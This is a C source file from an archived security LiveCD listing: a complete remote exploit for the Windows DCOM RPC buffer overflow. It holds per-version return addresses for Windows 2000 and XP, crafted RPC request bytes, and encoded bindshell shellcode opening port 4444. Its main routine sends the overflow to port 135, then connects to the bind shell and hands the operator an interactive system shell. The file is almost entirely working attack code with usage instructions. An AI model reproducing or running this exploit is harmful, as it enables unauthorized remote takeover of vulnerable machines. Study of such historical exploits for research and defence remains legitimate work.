home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / windows / 30.07.03.dcom.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  16KB  |  376 lines

---

1. /*
2.   DCOM RPC Overflow Discovered by LSD
3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
4.    
5.   Based on FlashSky/Benjurry's Code
6.    -> http://www.xfocus.org/documents/200307/2.html
7.    
8.   Written by H D Moore <hdm [at] metasploit.com>
9.    -> http://www.metasploit.com/
10.    
11.   - Usage: ./dcom <Target ID> <Target IP>
12.   - Targets:
13.   -          0    Windows 2000 SP0 (english)
14.   -          1    Windows 2000 SP1 (english)
15.   -          2    Windows 2000 SP2 (english)
16.   -          3    Windows 2000 SP3 (english)
17.   -          4    Windows 2000 SP4 (english)
18.   -          5    Windows XP SP0 (english)
19.   -          6    Windows XP SP1 (english)
20.   -          7    Windows 2000 SP3 (german)  // New Target
21.   -          8    Windows 2000 SP4 (german)  // New Target
22.   -          9    Windows 2000 SP4 (german) 2 // New Target
23.   -         10    Windows XP SP1 (german)    // New Target
24.  
25. */
26.  
27. #include <stdio.h>
28. #include <stdlib.h>
29. #include <error.h>
30. #include <sys/types.h>
31. #include <sys/socket.h>
32. #include <netinet/in.h>
33. #include <arpa/inet.h>
34. #include <unistd.h>
35. #include <netdb.h>
36. #include <fcntl.h>
37. #include <unistd.h>
38.  
39. unsigned char bindstr[]={
40. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
41. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
42. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
43. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
44. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
45.  
46. unsigned char request1[]={
47. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
48. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
49. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
50. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
51. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
52. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
53. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
54. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
55. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
56. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
57. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
58. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
59. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
60. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
61. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
62. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
63. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
65. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
67. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
71. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
72. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
73. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
74. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
75. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
76. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
77. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
78. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
79. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
80. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
82. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
83. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
84. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
85. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
86. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
87. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
88. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
89. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
90. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
91. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
92. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
93. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
94. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
95. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
96. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
97. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
98. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
99. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
100. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
101. ,0x00,0x00,0x00,0x00,0x00,0x00};
102.  
103. unsigned char request2[]={
104. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
105. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
106.  
107. unsigned char request3[]={
108. 0x5C,0x00
109. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
110. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
111. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
112. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
113.  
114.  
115.  
116. unsigned char *targets [] =
117.         {
118.             "Windows 2000 SP0 (english)",
119.             "Windows 2000 SP1 (english)",
120.             "Windows 2000 SP2 (english)",
121.             "Windows 2000 SP3 (english)",
122.             "Windows 2000 SP4 (english)",
123.             "Windows XP SP0 (english)",
124.             "Windows XP SP1 (english)",
125.             "Windows 2000 SP3 (german)",
126.             "Windows 2000 SP4 (german)",
127.             "Windows 2000 SP4 (german)2",
128.             "Windows XP SP1 (german)",
129.             
130.              NULL                                                                                       
131.         };
132.         
133. unsigned long offsets [] = 
134.         {
135.             0x77e81674, 
136.             0x77e829ec, 
137.             0x77e824b5, 
138.             0x77e8367a, 
139.             0x77f92a9b, 
140.             0x77e9afe3,
141.             0x77e626ba,
142.             0x77e32c29, // 7 2ksp3 ger
143.             0x77e04c29, // 8 2ksp4 ger
144.             0x77e2c256, // 9 2ksp4 ger 2
145.             0x77d418fc, //10 xpsp1 ger
146.           
147.         };
148.  
149. unsigned char sc[]=
150.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
151.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
152.     "\x46\x00\x58\x00\x46\x00\x58\x00"
153.  
154.     "\xff\xff\xff\xff" /* return address */
155.     
156.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
157.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
158.  
159.     /* port 4444 bindshell */
160.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
161.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
162.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
163.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
164.  
165.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
166.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
167.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
168.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
169.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
170.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
171.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
172.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
173.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
174.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
175.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
176.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
177.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
178.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
179.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
180.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
181.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
182.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
183.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
184.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
185.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
186.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
187.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
188.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
189.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
190.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
191.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
192.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
193.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
194.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
195.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
196.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
197.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
198.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
199.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
200.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
201.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
202.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
203.  
204.    
205.  
206. unsigned char request4[]={
207. 0x01,0x10
208. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
209. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
210. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
211. };
212.  
213.  
214. /* ripped from TESO code */
215. void shell (int sock)
216. {
217.         int     l;
218.         char    buf[512];
219.         fd_set  rfds;
220.  
221.  
222.         while (1) {
223.                 FD_SET (0, &rfds);
224.                 FD_SET (sock, &rfds);
225.  
226.                 select (sock + 1, &rfds, NULL, NULL, NULL);
227.                 if (FD_ISSET (0, &rfds)) {
228.                         l = read (0, buf, sizeof (buf));
229.                         if (l <= 0) {
230.                                 printf("\n - Connection closed by local user\n");
231.                                 exit (EXIT_FAILURE);
232.                         }
233.                         write (sock, buf, l);
234.                 }
235.  
236.                 if (FD_ISSET (sock, &rfds)) {
237.                         l = read (sock, buf, sizeof (buf));
238.                         if (l == 0) {
239.                                 printf ("\n - Connection closed by remote host.\n");
240.                                 exit (EXIT_FAILURE);
241.                         } else if (l < 0) {
242.                                 printf ("\n - Read failure\n");
243.                                 exit (EXIT_FAILURE);
244.                         }
245.                         write (1, buf, l);
246.                 }
247.         }
248. }
249.  
250.  
251. int main(int argc, char **argv)
252. {
253.     
254.     int sock;
255.     int len,len1;
256.     unsigned int target_id;
257.     unsigned long ret;
258.     struct sockaddr_in target_ip;
259.     unsigned short port = 135;
260.     unsigned char buf1[0x1000];
261.     unsigned char buf2[0x1000];
262.  
263.     printf("---------------------------------------------------------\n");
264.     printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
265.     printf("- Original code by FlashSky and Benjurry\n");
266.     printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
267.     printf("\n- Addresses found & added for\n  German Win2000 SP3/SP4, WinXP SP1 - by b@digitalwaste.org\n");
268.     
269.     printf("- More Adds were found but i guess everyone figured out howto get them by now :)\n\n");
270.     printf("- Greets to t0lm, b0ld on #breakbeat on undernet!\n\n\n");
271.     
272.  
273.  
274.     if(argc<3)
275.     {
276.         printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
277.         printf("- Targets:\n");
278.         for (len=0; targets[len] != NULL; len++)
279.         {
280.             printf("-          %d\t%s\n", len, targets[len]);   
281.         }
282.         printf("\n");
283.         exit(1);
284.     }
285.  
286.     /* yeah, get over it :) */
287.     target_id = atoi(argv[1]);
288.     ret = offsets[target_id];
289.     
290.     printf("- Using return address of 0x%.8x\n", ret);
291.  
292.     memcpy(sc+36, (unsigned char *) &ret, 4);
293.  
294.     target_ip.sin_family = AF_INET;
295.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
296.     target_ip.sin_port = htons(port);
297.  
298.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
299.     {
300.         perror("- Socket");
301.         return(0);
302.     }
303.     
304.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
305.     {
306.         perror("- Connect");
307.         return(0);
308.     }
309.     
310.     len=sizeof(sc);
311.     memcpy(buf2,request1,sizeof(request1));
312.     len1=sizeof(request1);
313.     
314.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
315.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
316.     
317.     memcpy(buf2+len1,request2,sizeof(request2));
318.     len1=len1+sizeof(request2);
319.     memcpy(buf2+len1,sc,sizeof(sc));
320.     len1=len1+sizeof(sc);
321.     memcpy(buf2+len1,request3,sizeof(request3));
322.     len1=len1+sizeof(request3);
323.     memcpy(buf2+len1,request4,sizeof(request4));
324.     len1=len1+sizeof(request4);
325.     
326.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
327.     
328.  
329.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
330.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
331.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
332.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
333.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
334.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
335.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
336.     
337.     if (send(sock,bindstr,sizeof(bindstr),0)== -1)
338.     {
339.             perror("- Send");
340.             return(0);
341.     }
342.     len=recv(sock, buf1, 1000, 0);
343.     
344.     if (send(sock,buf2,len1,0)== -1)
345.     {
346.             perror("- Send");
347.             return(0);
348.     }
349.     close(sock);
350.     sleep(1);
351.     
352.     target_ip.sin_family = AF_INET;
353.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
354.     target_ip.sin_port = htons(4444);
355.  
356.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
357.     {
358.         perror("- Socket");
359.         return(0);
360.     }
361.     
362.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
363.     {
364.         printf("- Exploit appeared to have failed.\n");
365.         return(0);
366.     }   
367.     
368.     printf("- Dropping to System Shell...\n\n");
369.  
370.     shell(sock);
371.     
372.     return(0);
373. }
374.  
375.  
376.